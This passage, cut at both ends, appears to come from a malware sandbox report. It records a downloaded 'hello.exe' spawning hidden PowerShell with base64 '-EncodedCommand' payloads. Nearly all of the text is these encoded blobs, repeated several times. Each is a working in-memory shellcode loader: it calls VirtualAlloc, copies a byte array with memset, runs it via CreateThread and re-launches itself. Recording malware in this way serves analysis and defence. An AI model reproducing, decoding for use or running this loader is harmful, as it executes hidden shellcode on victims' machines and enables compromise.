EAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:8264

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:5408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:6628

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:6632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAd